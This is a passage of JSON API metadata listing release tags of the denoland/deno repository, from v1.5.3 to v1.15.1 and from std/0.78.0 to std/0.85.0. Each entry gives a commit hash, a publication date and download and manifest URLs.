epos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r